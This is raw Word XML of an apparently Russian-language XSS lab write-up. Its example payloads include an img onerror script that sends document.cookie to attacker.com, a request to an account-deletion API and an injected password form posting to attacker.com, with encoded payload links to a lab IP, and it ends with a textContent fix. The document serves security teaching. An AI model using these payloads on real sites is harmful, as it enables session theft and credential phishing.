          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>=&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>='+</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5525CF27" w14:textId="036D0080" w:rsidR="00D442A9" w:rsidRPr="00D442A9" w:rsidRDefault="00D442A9" w:rsidP="00D442A9">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Сработает, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9"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>хранятся не безопасно</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">без </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9ABC4" w14:textId="464A7A18" w:rsidR="00D442A9" w:rsidRDefault="00930DD3" w:rsidP="00D442A9">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Удалить аккаунт, выложить пост и т. д. Все зависит от возможностей сервиса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64635897" w14:textId="3A145079" w:rsidR="00930DD3" w:rsidRDefault="00930DD3" w:rsidP="00930DD3">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deleteAccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{ method</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 'POST</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765A122" w14:textId="5035E92C" w:rsidR="00930DD3" w:rsidRPr="00E80C6C" w:rsidRDefault="00930DD3" w:rsidP="00930DD3">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Фишинг внутри сайта. Добавить форму атакующего на сайт, отправить ссылку жертве, жертва введет данные в форму злоумышленника, думая, что вводит данные для доверенного сервиса.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;form action="https://attacker.com</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>input placeholder="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Введите</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>пароль</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00930DD3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E9FE15" w14:textId="2F91FA9D" w:rsidR="00E80C6C" w:rsidRPr="00E80C6C" w:rsidRDefault="00E80C6C" w:rsidP="00E80C6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Как исправить?</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>Использовать для вывода текста более безопасный вариант, который по умолчанию будет экранировать ввод.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Вместо </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>используе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E80C6C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C0DA9" w14:textId="77777777" w:rsidR="00930DD3" w:rsidRPr="00E80C6C" w:rsidRDefault="00930DD3" w:rsidP="00930DD3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00930DD3" w:rsidRPr="00E80C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A2C70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D2EAE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A46FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA56F2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F56161"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87B21B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556680"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A59A9C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429278">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1436367615">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1775318692">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1882130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DE4"/>
    <w:rsid w:val="004741F5"/>
    <w:rsid w:val="00695730"/>
    <w:rsid w:val="00930DD3"/>
    <w:rsid w:val="00A24E80"/>
    <w:rsid w:val="00AC2DC2"/>
    <w:rsid w:val="00B55DE4"/>
    <w:rsid w:val="00CA3ADF"/>
    <w:rsid w:val="00D442A9"/>
    <w:rsid w:val="00E8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7F657"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8A362A35-EC04-4E0B-A3BE-2E27704F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D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D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5D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5D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5D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5D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5D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5D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5D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5D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5D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5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5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5D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5D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5D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5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5D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5DE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55DE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55DE4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C2D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62.173.140.174:36101/?q=%3Cdiv+style%3D%22position%3A+absolute%3B+z-index%3A+100%3B+width%3A+100vw%3B+height%3A+100vh%3B+top%3A0%3B+right%3A0%22+onclick%3D%22alert%28document.domain%29%22%3E%3C%2Fdiv%3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62.173.140.174:36101" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://62.173.140.174:36101/?q=%3Cform+action%3D%22https%3A%2F%2Fattacker.com%22+style%3D%22position%3A+relative%3Bz-index%3A+100%3Bmargin-top%3A+-20px%3B%2F*+background%3A+var%28--bg%29%3B+*%2F%22%3E%3Cp+class%3D%22subtitle%22+style%3D%22background%3A+aliceblue%3Bwidth%3A+fit-content%3B%22%3E%D0%94%D0%BB%D1%8F+%D0%BA%D0%BE%D1%80%D1%80%D0%B5%D0%BA%D1%82%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BF%D0%BE%D0%B8%D1%81%D0%BA%D0%B0+%D0%B2%D0%B2%D0%B5%D0%B4%D0%B8%D1%82%D0%B5+%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D1%8C%21%3C%2Fp%3E%3Cinput+placeholder%3D%22%D0%92%D0%B2%D0%B5%D0%B4%D0%B8%D1%82%D0%B5+%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D1%8C%22+style%3D%22+++++border%3A+1px+%23e5e7eb+solid%3B+++++border-radius%3A+12px%3B+++++width%3A+100%25%3B+++++padding%3A+14px%3B+%22%3E%3C%2Fform%3E" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://62.173.140.174:36101/?q=%3Cimg+src%3Dx+onerror%3D%22alert%28document.domain%29%22%3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Микрюков</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Данила Микрюков</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-25T08:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-25T10:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>